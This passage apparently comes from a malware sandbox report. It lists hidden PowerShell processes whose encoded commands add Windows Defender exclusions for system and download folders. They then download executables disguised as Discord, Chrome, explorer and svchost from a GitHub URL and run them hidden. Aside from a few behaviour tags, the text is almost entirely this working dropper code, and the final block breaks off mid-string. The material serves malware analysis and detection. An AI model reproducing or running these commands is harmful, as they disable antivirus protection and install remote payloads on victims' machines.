c A T Q B B A G I A Q Q B C A D E A Q Q B I A E 0 A Q Q B h A F E A Q g B 2 A E E A R w A 0 A E E A V Q B B A E I A a A B B A E g A U Q B B A G E A Q Q B B A G c A Q Q B D A G M A Q Q B R A H c A Q Q A 2 A E E A R g B 3 A E E A V g B 3 A E I A c A B B A E c A N A B B A F o A Q Q B C A H Y A Q Q B I A G M A Q Q B j A H c A Q g B j A E E A R g B N A E E A Z Q B R A E I A e g B B A E Y A Y w B B A F Q A d w B C A F g A Q Q B E A F k A Q Q B O A E E A Q Q B u A E E A Q w B J A E E A Q w B n A E I A d w B B A E c A O A B B A G Q A d w B C A G w A Q Q B I A E k A Q Q B j A H c A Q g B v A E E A R w B V A E E A Y g B B A E I A c w B B A E M A Q Q B B A E w A U Q B C A F g A Q Q B H A G s A Q Q B i A G c A Q g B r A E E A R w A 4 A E E A Z A B 3 A E I A V A B B A E g A U Q B B A G U A U Q B C A H M A Q Q B H A F U A Q Q B J A E E A Q g B J A E E A R w B r A E E A W g B B A E I A a w B B A E c A V Q B B A G I A Z w B B A G c A Q Q B D A D A A Q Q B R A H c A Q g B 2 A E E A R w A w A E E A Y g B R A E I A a A B B A E c A N A B B A F o A Q Q B B A G c A Q Q B D A E k A Q Q B R A F E A Q g B r A E E A R w B R A E E A T A B R A E I A T g B B A E g A Q Q B B A F U A Q Q B C A H k A Q Q B H A F U A Q Q B a A G c A Q g B s A E E A S A B J A E E A W g B R A E I A d Q B B A E c A T Q B B A F o A U Q B B A G c A Q Q B D A D A A Q Q B S A F E A Q g A 0 A E E A R w B N A E E A Y g B B A E I A M Q B B A E g A T Q B B A G E A U Q B C A H Y A Q Q B H A D Q A Q Q B V A E E A Q g B o A E E A S A B R A E E A Y Q B B A E E A Z w B B A E M A Y w B B A F E A d w B B A D Y A Q Q B G A H c A Q Q B W A H c A Q g B w A E E A R w A 0 A E E A W g B B A E I A d g B B A E g A Y w B B A G M A d w B B A G 4 A Q Q B D A E k A Q Q B D A G c A Q Q B L A E E A Q w B R A E E A Z A B R A E I A e Q B B A E c A d w B B A E 0 A U Q B B A G c A Q Q B E A D A A Q Q B J A E E A Q Q B u A E E A R w B n A E E A Z A B B A E I A M A B B A E g A Q Q B B A G M A d w B B A D Y A Q Q B D A D g A Q Q B M A H c A Q g B u A E E A R w B r A E E A Z A B B A E I A b w B B A E g A V Q B B A F k A Z w B B A H U A Q Q B H A E 0 A Q Q B i A H c A Q g B 0 A E E A Q w A 4 A E E A U Q B R A E I A d A B B A E c A b w B B A F k A U Q B C A G s A Q Q B F A E k A Q Q B Z A F E A Q g B z A E E A R w B 3 A E E A Y w B 3 A E E A d g B B A E Y A U Q B B A F I A U Q B C A F Q A Q Q B G A F E A Q Q B M A H c A Q g B 5 A E E A R w B F A E E A Z A B 3 A E E A d g B B A E g A S Q B B A F o A U Q B C A G 0 A Q Q B I A E 0 A Q Q B M A H c A Q g B v A E E A R w B V A E E A W Q B R A E I A a w B B A E g A T Q B B A E w A d w B C A H Q A Q Q B H A E U A Q Q B h A F E A Q g B 1 A E E A Q w A 4 A E E A U g B B A E I A c A B B A E g A T Q B B A F k A d w B C A H Y A Q Q B I A E k A Q Q B a A E E A Q Q B 1 A E E A R w B V A E E A Z Q B B A E I A b A B B A E M A Y w B B A E M A Z w B B A G s A Q Q B I A F U A Q Q B j A G c A Q g B z A E E A R A B J A E E A S Q B B A E E A O Q B B A E M A Q Q B B A E o A d w B C A G 8 A Q Q B I A F E A Q Q B k A E E A Q g B 3 A E E A S A B N A E E A T w B n A E E A d g B B A E M A O A B B A F o A d w B C A H A A Q Q B I A F E A Q Q B h A E E A Q g A x A E E A R w B J A E E A T A B n A E I A a g B B A E c A O A B B A G I A U Q B B A H Y A Q Q B F A E U A Q Q B i A F E A Q g B x A E E A R w B F A E E A W g B B A E I A Q w B B A E c A R Q B B A G I A Q Q B C A H M A Q Q B I A E 0 A Q Q B M A H c A Q g B V A E E A R Q B V A E E A V Q B 3 A E I A V Q B B A E M A O A B B A G M A Z w B C A G g A Q Q B I A G M A Q Q B M A H c A Q g B 5 A E E A R w B V A E E A W g B n A E I A e g B B A E M A O A B B A G E A Q Q B C A G w A Q Q B H A E U A Q Q B a A E E A Q g B 6 A E E A Q w A 4 A E E A Y g B R A E I A a A B B A E c A a w B B A G I A Z w B B A H Y A Q Q B F A G M A Q Q B i A H c A Q g B 2 A E E A R w B j A E E A Y g B B A E I A b A B B A E U A T Q B B A G E A Q Q B C A H k A Q Q B H A D g A Q Q B i A F E A Q g B s A E E A Q w A 0 A E E A W g B R A E I A N A B B A E c A V Q B B A E o A d w B B A E s A Q Q B D A F E A Q Q B k A F E A Q g B 5 A E E A R w B 3 A E E A T Q B 3 A E E A Z w B B A E Q A M A B B A E k A Q Q B B A G 4 A Q Q B H A G c A Q Q B k A E E A Q g A w A E E A S A B B A E E A Y w B 3 A E E A N g B B A E M A O A B B A E w A d w B C A G 4 A Q Q B H A G s A Q Q B k A E E A Q g B v A E E A S A B V A E E A W Q B n A E E A d Q B B A E c A T Q B B A G I A d w B C A H Q A Q Q B D A D g A Q Q B R A F E A Q g B 0 A E E A R w B v A E E A W Q B R A E I A a w B B A E U A S Q B B A F k A U Q B C A H M A Q Q B H A H c A Q Q B j A H c A Q Q B 2 A E E A R g B R A E E A U g B R A E I A V A B B A E Y A U Q B B A E w A d w B C A H k A Q Q B H A E U A Q Q B k A H c A Q Q B 2 A E E A S A B J A E E A W g B R A E I A b Q B B A E g A T Q B B A E w A d w B C A G 8 A Q Q B H A F U A Q Q B Z A F E A Q g B r A E E A S A B N A E E A T A B 3 A E I A d A B B A E c A R Q B B A G E A U Q B C A H U A Q Q B D A D g A Q Q B a A F E A Q g A 0 A E E A S A B B A E E A Y g B B A E I A d g B B A E g A S Q B B A F o A U Q B C A H k A Q Q B D A D Q A Q Q B a A F E A Q g A 0 A E E A R w B V A E E A S g B 3 A E E A S w B B A E M A U Q B B A G Q A U Q B C A H k A Q Q B H A H c A Q Q B O A E E A Q Q B n A E E A R A A w A E E A S Q B B A E E A b g B B A E c A Z w B B A G Q A Q Q B C A D A A Q Q B I A E E A Q Q B j A H c A Q Q A 2 A E E A Q w A 4 A E E A T A B 3 A E I A b g B B A E c A a w B B A G Q A Q Q B C A G 8 A Q Q B I A F U A Q Q B Z A G c A Q Q B 1 A E E A R w B N A E E A Y g B 3 A E I A d A B B A E M A O A B B A F E A U Q B C A H Q A Q Q B H A G 8 A Q Q B Z A F E A Q g B r A E E A R Q B J A E E A W Q B R A E I A c w B B A E c A d w B B A G M A d w B B A H Y A Q Q B G A F E A Q Q B S A F E A Q g B U A E E A R g B R A E E A T A B 3 A E I A e Q B B A E c A R Q B B A G Q A d w B B A H Y A Q Q B I A E k A Q Q B a A F E A Q g B t A E E A S A B N A E E A T A B 3 A E I A b w B B A E c A V Q B B A F k A U Q B C A G s A Q Q B I A E 0 A Q Q B M A H c A Q g B 0 A E E A R w B F A E E A Y Q B R A E I A d Q B B A E M A O A B B A G M A d w B C A D I A Q Q B H A E 0 A Q Q B h A E E A Q g B 2 A E E A S A B N A E E A Z A B B A E E A d Q B B A E c A V Q B B A G U A Q Q B C A G w A Q Q B D A G M A Q Q B D A G c A Q Q B L A E E A Q w B R A E E A Y g B B A E I A d g B B A E c A T Q B B A F k A U Q B C A D A A Q Q B H A G s A Q Q B i A H c A Q g B 1 A E E A S A B N A E E A S Q B B A E E A O Q B B A E M A Q Q B B A F E A Q Q B B A G 8 A Q Q B B A G 8 A Q Q B J A E E A Q Q B n A E E A Q w B B A E E A S Q B B A E E A b g B B A E U A T Q B B A E 8 A Z w B C A G M A Q Q B G A F U A Q Q B j A H c A Q g B s A E E A S A B J A E E A Y w B 3 A E I A Y w B B A E Y A Q Q B B A G Q A U Q B C A G k A Q Q B H A H c A Q Q B h A F E A Q g B q A E E A R g B 3 A E E A U g B B A E I A d g B B A E g A Y w B B A G I A Z w B C A H M A Q Q B H A D g A Q Q B Z A F E A Q g B r A E E A S A B N A E E A W A B B A E I A R Q B B A E c A a w B B A G M A d w B C A G o A Q Q B H A D g A Q Q B j A G c A Q g B r A E E A Q w A 0 A E E A W g B R A E I A N A B B A E c A V Q B B A E o A d w B B A H M A Q Q B B A G 8 A Q Q B J A E E A Q Q B n A E E A Q w B B A E E A S Q B B A E E A b g B B A E U A T Q B B A E 8 A Z w B C A G M A Q Q B G A F U A Q Q B j A H c A Q g B s A E E A S A B J A E E A Y w B 3 A E I A Y w B B A E Y A Q Q B B A G Q A U Q B C A G k A Q Q B H A H c A Q Q B h A F E A Q g B q A E E A R g B 3 A E E A U g B B A E I A d g B B A E g A Y w B B A G I A Z w B C A H M A Q Q B H A D g A Q Q B Z A F E A Q g B r A E E A S A B N A E E A W A B B A E I A S A B B A E c A O A B B A G I A d w B C A G 4 A Q Q B H A H c A Q Q B a A F E A Q g B E A E E A R w B n A E E A Y w B n A E I A d g B B A E c A M A B B A F o A U Q B B A H U A Q Q B H A F U A Q Q B l A E E A Q g B s A E E A Q w B j A E E A T A B B A E E A S w B B A E M A Q Q B B A E k A Q Q B B A G c A Q Q B D A E E A Q Q B K A H c A Q g B E A E E A R A B v A E E A W A B B A E I A V g B B A E g A T Q B B A F o A U Q B C A H k A Q Q B I A E 0 A Q Q B Y A E E A Q g B R A E E A S A B V A E E A W Q B n A E I A c w B B A E c A a w B B A F k A d w B C A G M A Q Q B F A F E A Q Q B i A H c A Q g A z A E E A R w A 0 A E E A Y g B B A E I A d g B B A E c A R Q B B A F o A Q Q B C A H o A Q Q B G A H c A Q Q B a A F E A Q g A 0 A E E A S A B B A E E A Y g B B A E I A d g B B A E g A S Q B B A F o A U Q B C A H k A Q Q B D A D Q A Q Q B a A F E A Q g A 0 A E E A R w B V A E E A S g B 3 A E E A c w B B A E E A b w B B A E k A Q Q B B A G c A Q Q B D A E E A Q Q B J A E E A Q Q B u A E E A R Q B N A E E A T w B n A E I A Y w B B A E Y A V Q B B A G M A d w B C A G w A Q Q B I A E k A Q Q B j A H c A Q g B j A E E A R g B B A E E A Z A B R A E I A a Q B B A E c A d w B B A G E A U Q B C A G o A Q Q B G A H c A Q Q B S A E E A Q g B 2 A E E A S A B j A E E A Y g B n A E I A c w B B A E c A O A B B A F k A U Q B C A G s A Q Q B I A E 0 A Q Q B Y A E E A Q g B 6 A E E A S A B Z A E E A W Q B 3 A E I A b w B B A E c A O A B B A G M A d w B C A D A A Q Q B D A D Q A Q Q B a A F E A Q g A 0 A E E A R w B V A E E A S g B 3 A E E A S w B B A E M A a w B B A E M A Z w B B A E s A Q Q B F A G s A Q Q B i A G c A Q g A y A E E A R w A 4 A E E A Y Q B 3 A E I A b A B B A E M A M A B B A F Y A d w B C A G w A Q Q B H A E k A Q Q B V A G c A Q g B s A E E A S A B F A E E A Z A B R A E I A b A B B A E g A T Q B B A G Q A Q Q B B A G c A Q Q B D A D A A Q Q B W A F E A Q g B 5 A E E A R w B r A E E A S Q B B A E E A a w B B A E g A V Q B B A G M A Z w B C A H M A Q Q B E A E U A Q Q B J A E E A Q Q B 0 A E E A R Q A 4 A E E A Z A B R A E I A M A B B A E U A W Q B B A G E A U Q B C A H M A Q Q B H A F U A Q Q B J A E E A Q Q B r A E E A R w B 3 A E E A Y g B 3 A E I A a g B B A E c A R Q B B A G Q A Q Q B C A H A A Q Q B H A D g A Q Q B i A G c A Q g B 6 A E E A R g B z A E E A T Q B B A E I A Z A B B A E E A b w B B A F M A U Q B C A H U A Q Q B I A F k A Q Q B i A H c A Q g B y A E E A R w B V A E E A T A B R A E I A W A B B A E c A V Q B B A F k A Z w B C A F M A Q Q B H A F U A Q Q B j A F E A Q g A x A E E A R w B V A E E A Y w B 3 A E I A M A B B A E M A Q Q B B A E w A U Q B C A F Y A Q Q B I A E k A Q Q B h A F E A Q Q B n A E E A Q w B R A E E A Z A B R A E I A e Q B B A E c A d w B B A E 0 A Z w B B A G c A Q Q B D A D A A Q Q B U A H c A Q g A x A E E A S A B R A E E A U g B n A E I A c A B B A E c A d w B B A F o A U Q B B A G c A Q Q B D A F E A Q Q B i A E E A Q g B 2 A E E A R w B N A E E A W Q B R A E I A M A B B A E c A a w B B A G I A d w B C A H U A Q Q B I A E 0 A Q Q B X A H c A Q Q B 4 A E E A R g A w A E E A Q w B n A E I A S g B B A E c A N A B B A G Q A Z w B C A H Y A Q Q B H A H M A Q Q B a A F E A Q Q B 0 A E E A R g B j A E E A W g B R A E I A a Q B B A E Y A S Q B B A F o A U Q B C A H g A Q Q B I A F U A Q Q B a A F E A Q g B 6 A E E A S A B R A E E A S Q B B A E E A d A B B A E Y A V Q B B A G M A Z w B C A H A A Q Q B D A E E A Q Q B K A E E A Q g A x A E E A S A B J A E E A Y g B B A E E A e g B B A E M A Q Q B B A E w A U Q B C A F A A Q Q B I A F U A Q Q B k A E E A Q g B H A E E A R w B r A E E A Y g B B A E I A b A B B A E M A Q Q B B A E o A Q Q B C A H M A Q Q B H A D g A Q Q B Z A H c A Q g B o A E E A S A B R A E E A Y Q B R A E I A d g B B A E c A N A B B A G M A d w B C A G I A Q Q B E A E k A Q Q B Y A F E A Q Q B L A E E A R Q B r A E E A Y g B n A E I A M g B B A E c A O A B B A G E A d w B C A G w A Q Q B D A D A A Q Q B W A H c A Q g B s A E E A R w B J A E E A V Q B n A E I A b A B B A E g A R Q B B A G Q A U Q B C A G w A Q Q B I A E 0 A Q Q B k A E E A Q Q B n A E E A Q w A w A E E A V g B R A E I A e Q B B A E c A a w B B A E k A Q Q B B A G s A Q Q B I A F U A Q Q B j A G c A Q g B z A E E A R A B R A E E A S Q B B A E E A d A B B A E U A O A B B A G Q A U Q B C A D A A Q Q B F A F k A Q Q B h A F E A Q g B z A E E A R w B V A E E A S Q B B A E E A a w B B A E c A d w B B A G I A d w B C A G o A Q Q B H A E U A Q Q B k A E E A Q g B w A E E A R w A 4 A E E A Y g B n A E I A e g B B A E Y A c w B B A E 0 A d w B C A G Q A Q Q B B A G 8 A Q Q B D A G c A Q g B t A E E A R w A 4 A E E A Y w B n A E I A b A B B A E c A R Q B B A F k A d w B C A G 8 A Q Q B D A E E A Q Q B L A E E A Q Q B r A E E A R w B 3 A E E A Y g B 3 A E I A a g B B A E c A R Q B B A G Q A Q Q B C A H A A Q Q B H A D g A Q Q B i A G c A Q Q B n A E E A R w B r A E E A Y g B n A E E A Z w B B A E M A U Q B B A G I A Q Q B C A H Y A Q Q B H A E 0 A Q Q B Z A F E A Q g A w A E E A R w B r A E E A Y g B 3 A E I A d Q B B A E g A T Q B B A E s A U Q B B A G c A Q Q B I A H M A Q Q B D A G c A Q Q B n A E E A Q w B B A E E A S Q B B A E E A Z w B B A E Y A T Q B B A G Q A Q Q B C A G g A Q Q B I A E k A Q Q B k A E E A Q Q B 0 A E E A R g B B A E E A Y w B n A E I A d g B B A E c A T Q B B A F o A U Q B C A H o A Q Q B I A E 0 A Q Q B J A E E A Q Q B 0 A E E A R Q B Z A E E A Y Q B R A E I A c w B B A E c A V Q B B A F U A Q Q B C A G g A Q Q B I A F E A Q Q B h A E E A Q Q B n A E E A Q w B R A E E A Y g B B A E I A d g B B A E c A T Q B B A F k A U Q B C A D A A Q Q B H A G s A Q Q B i A H c A Q g B 1 A E E A Q w B B A E E A T A B R A E I A W A B B A E c A a w B B A G I A Z w B C A G s A Q Q B H A D g A Q Q B k A H c A Q g B U A E E A S A B R A E E A Z Q B R A E I A c w B B A E c A V Q B B A E k A Q Q B C A E k A Q Q B H A G s A Q Q B a A E E A Q g B r A E E A R w B V A E E A Y g B n A E E A Z w B B A E M A M A B B A F Y A d w B C A G g A Q Q B H A G s A Q Q B k A E E A Q Q B L A E E A S A A w A E E A I g A = " 
 3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand p o w e r s h e l l   - N o P r o f i l e   - E x e c u t i o n P o l i c y   B y p a s s   - W i n d o w S t y l e   H i d d e n   - E n c o d e d C o m m a n d   " c A B v A H c A Z Q B y A H M A a A B l A G w A b A A g A C 0 A V w B p A G 4 A Z A B v A H c A U w B 0 A H k A b A B l A C A A S A B p A G Q A Z A B l A G 4 A I A A t A E M A b w B t A G 0 A Y Q B u A G Q A I A A i A E E A Z A B k A C 0 A T Q B w A F A A c g B l A G Y A Z Q B y A G U A b g B j A G U A I A A t A E U A e A B j A G w A d Q B z A G k A b w B u A F A A Y Q B 0 A G g A I A A n A E M A O g B c A F A A c g B v A G c A c g B h A G 0 A R A B h A H Q A Y Q A n A C I A C g B w A G 8 A d w B l A H I A c w B o A G U A b A B s A C A A L Q B X A G k A b g B k A G 8 A d w B T A H Q A e Q B s A G U A I A B I A G k A Z A B k A G U A b g A g A C 0 A Q w B v A G 0 A b Q B h A G 4 A Z A A g A C I A Q Q B k A G Q A L Q B N A H A A U A B y A G U A Z g B l A H I A Z Q B u A G M A Z Q A g A C 0 A R Q B 4 A G M A b A B 1 A H M A a Q B v A G 4 A U A B h A H Q A a A A g A C c A Q w A 6 A F w A V Q B z A G U A c g B z A F w A U A B 1 A G I A b A B p A G M A X A B E A G 8 A d w B u A G w A b w B h A G Q A c w A n A C I A C g B w A G 8 A d w B l A H I A c w B o A G U A b A B s A C A A L Q B X A G k A b g B k A G 8 A d w B T A H Q A e Q B s A G U A I A B I A G k A Z A B k A G U A b g A g A C 0 A Q w B v A G 0 A b Q B h A G 4 A Z A A g A C I A Q Q B k A G Q A L Q B N A H A A U A B y A G U A Z g B l A H I A Z Q B u A G M A Z Q A g A C 0 A R Q B 4 A G M A b A B 1 A H M A a Q B v A G 4 A U A B h A H Q A a A A g A C c A Q w A 6 A F w A V w B p A G 4 A Z A B v A H c A c w B c A F M A e Q B z A H Q A Z Q B t A D M A M g A n A C I A C g B w A G 8 A d w B l A H I A c w B o A G U A b A B s A C A A L Q B X A G k A b g B k A G 8 A d w B T A H Q A e Q B s A G U A I A B I A G k A Z A B k A G U A b g A g A C 0 A Q w B v A G 0 A b Q B h A G 4 A Z A A g A C I A Q Q B k A G Q A L Q B N A H A A U A B y A G U A Z g B l A H I A Z Q B u A G M A Z Q A g A C 0 A R Q B 4 A G M A b A B 1 A H M A a Q B v A G 4 A U A B h A H Q A a A A g A C c A Q w A 6 A F w A V w B p A G 4 A Z A B v A H c A c w B c A F M A e Q B z A F c A T w B X A D Y A N A A n A C I A C g B w A G 8 A d w B l A H I A c w B o A G U A b A B s A C A A L Q B X A G k A b g B k A G 8 A d w B T A H Q A e Q B s A G U A I A B I A G k A Z A B k A G U A b g A g A C 0 A Q w B v A G 0 A b Q B h A G 4 A Z A A g A C I A Q Q B k A G Q A L Q B N A H A A U A B y A G U A Z g B l A H I A Z Q B u A G M A Z Q A g A C 0 A R Q B 4 A G M A b A B 1 A H M A a Q B v A G 4 A U A B h A H Q A a A A g A C c A Q w A 6 A F w A V w B p A G 4 A Z A B v A H c A c w A n A C I A C g A K A C Q A d Q B y A G w A M Q A g A D 0 A I A A n A G g A d A B 0 A H A A c w A 6 A C 8 A L w B n A G k A d A B o A H U A Y g A u A G M A b w B t A C 8 A Q Q B t A G o A Y Q B k A E I A Y Q B s A G w A c w A v A F Q A R Q B T A F Q A L w B y A G E A d w A v A H I A Z Q B m A H M A L w B o A G U A Y Q B k A H M A L w B t A G E A a Q B u A C 8 A R A B p A H M A Y w B v A H I A Z A A u A G U A e A B l A C c A C g A k A H U A c g B s A D I A I A A 9 A C A A J w B o A H Q A d A B w A H M A O g A v A C 8 A Z w B p A H Q A a A B 1 A G I A L g B j A G 8 A b Q A v A E E A b Q B q A G E A Z A B C A G E A b A B s A H M A L w B U A E U A U w B U A C 8 A c g B h A H c A L w B y A G U A Z g B z A C 8 A a A B l A G E A Z A B z A C 8 A b Q B h A G k A b g A v A E c A b w B v A G c A b A B l A E M A a A B y A G 8 A b Q B l A C 4 A Z Q B 4 A G U A J w A K A C Q A d Q B y A G w A M w A g A D 0 A I A A n A G g A d A B 0 A H A A c w A 6 A C 8 A L w B n A G k A d A B o A H U A Y g A u A G M A b w B t A C 8 A Q Q B t A G o A Y Q B k A E I A Y Q B s A G w A c w A v A F Q A R Q B T A F Q A L w B y A G E A d w A v A H I A Z Q B m A H M A L w B o A G U A Y Q B k A H M A L w B t A G E A a Q B u A C 8 A Z Q B 4 A H A A b A B v A H I A Z Q B y A C 4 A Z Q B 4 A G U A J w A K A C Q A d Q B y A G w A N A A g A D 0 A I A A n A G g A d A B 0 A H A A c w A 6 A C 8 A L w B n A G k A d A B o A H U A Y g A u A G M A b w B t A C 8 A Q Q B t A G o A Y Q B k A E I A Y Q B s A G w A c w A v A F Q A R Q B T A F Q A L w B y A G E A d w A v A H I A Z Q B m A H M A L w B o A G U A Y Q B k A H M A L w B t A G E A a Q B u A C 8 A c w B 2 A G M A a A B v A H M A d A A u A G U A e A B l A C c A C g A K A C Q A b A B v A G M A Y Q B 0 A G k A b w B u A H M A I A A 9 A C A A Q A A o A A o A I A A g A C A A I A A n A E M A O g B c A F U A c w B l A H I A c w B c A F A A d Q B i A G w A a Q B j A F w A R A B v A H c A b g B s A G 8 A Y Q B k A H M A X A B E A G k A c w B j A G 8 A c g B k A C 4 A Z Q B 4 A G U A J w A s A A o A I A A g A C A A I A A n A E M A O g B c A F U A c w B l A H I A c w B c A F A A d Q B i A G w A a Q B j A F w A R A B v A H c A b g B s A G 8 A Y Q B k A H M A X A B H A G 8 A b w B n A G w A Z Q B D A G g A c g B v A G 0 A Z Q A u A G U A e A B l A C c A L A A K A C A A I A A g A C A A J w B D A D o A X A B V A H M A Z Q B y A H M A X A B Q A H U A Y g B s A G k A Y w B c A E Q A b w B 3 A G 4 A b A B v A G E A Z A B z A F w A Z Q B 4 A H A A b A B v A H I A Z Q B y A C 4 A Z Q B 4 A G U A J w A s A A o A I A A g A C A A I A A n A E M A O g B c A F U A c w B l A H I A c w B c A F A A d Q B i A G w A a Q B j A F w A R A B v A H c A b g B s A G 8 A Y Q B k A H M A X A B z A H Y A Y w B o A G 8 A c w B 0 A C 4 A Z Q B 4 A G U A J w A K A C k A C g A K A E k A b g B 2 A G 8 A a w B l A C 0 A V w B l A G I A U g B l A H E A d Q B l A H M A d A A g A C 0 A V Q B y A G k A I A A k A H U A c g B s A D E A I A A t A E 8 A d Q B 0 A E Y A a Q B s A G U A I A A k A G w A b w B j A G E A d A B p A G 8 A b g B z A F s A M A B d A A o A S Q B u A H Y A b w B r A G U A L Q B X A G U A Y g B S A G U A c Q B 1 A G U A c w B 0 A C A A L Q B V A H I A a Q A g A C Q A d Q B y A G w A M g A g A C 0 A T w B 1 A H Q A R g B p A G w A Z Q A g A C Q A b A B v A G M A Y Q B 0 A G k A b w B u A H M A W w A x A F 0 A C g B J A G 4 A d g B v A G s A Z Q A t A F c A Z Q B i A F I A Z Q B x A H U A Z Q B z A H Q A I A A t A F U A c g B p A C A A J A B 1 A H I A b A A z A C A A L Q B P A H U A d A B G A G k A b A B l A C A A J A B s A G 8 A Y w B h A H Q A a Q B v A G 4 A c w B b A D I A X Q A K A E k A b g B 2 A G 8 A a w B l A C 0 A V w B l A G I A U g B l A H E A d Q B l A H M A d A A g A C 0 A V Q B y A G k A I A A k A H U A c g B s A D Q A I A A t A E 8 A d Q B 0 A E Y A a Q B s A G U A I A A k A G w A b w B j A G E A d A B p A G 8 A b g B z A F s A M w B d A A o A C g B m A G 8 A c g B l A G E A Y w B o A C A A K A A k A G w A b w B j A G E A d A B p A G 8 A b g A g A G k A b g A g A C Q A b A B v A G M A Y Q B 0 A G k A b w B u A H M A K Q A g A H s A C g A g A C A A I A A g A F M A d A B h A H I A d A A t A F A A c g B v A G M A Z Q B z A H M A I A A t A E Y A a Q B s A G U A U A B h A H Q A a A A g A C Q A b A B v A G M A Y Q B 0 A G k A b w B u A C A A L Q B X A G k A b g B k A G 8 A d w B T A H Q A e Q B s A G U A I A B I A G k A Z A B k A G U A b g A g A C 0 A V w B h A G k A d A A K A H 0 A " 4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAiAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcATwBXADYANAAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwAnACIACgAKACQAdQByAGwAMQAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8ARABpAHMAYwBvAHIAZAAuAGUAeABlACcACgAkAHUAcgBsADIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEEAbQBqAGEAZABCAGEAbABsAHMALwBUAEUAUwBUAC8AcgBhAHcALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEcAbwBvAGcAbABlAEMAaAByAG8AbQBlAC4AZQB4AGUAJwAKACQAdQByAGwAMwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAKACQAdQByAGwANAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AcwB2AGMAaABvAHMAdAAuAGUAeABlACcACgAKACQAbABvAGMAYQB0AGkAbwBuAHMAIAA9ACAAQAAoAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABEAGkAcwBjAG8AcgBkAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABHAG8AbwBnAGwAZQBDAGgAcgBvAG0AZQAuAGUAeABlACcALAAKACAAIAAgACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAEQAbwB3AG4AbABvAGEAZABzAFwAZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwAKACkACgAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADEAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAG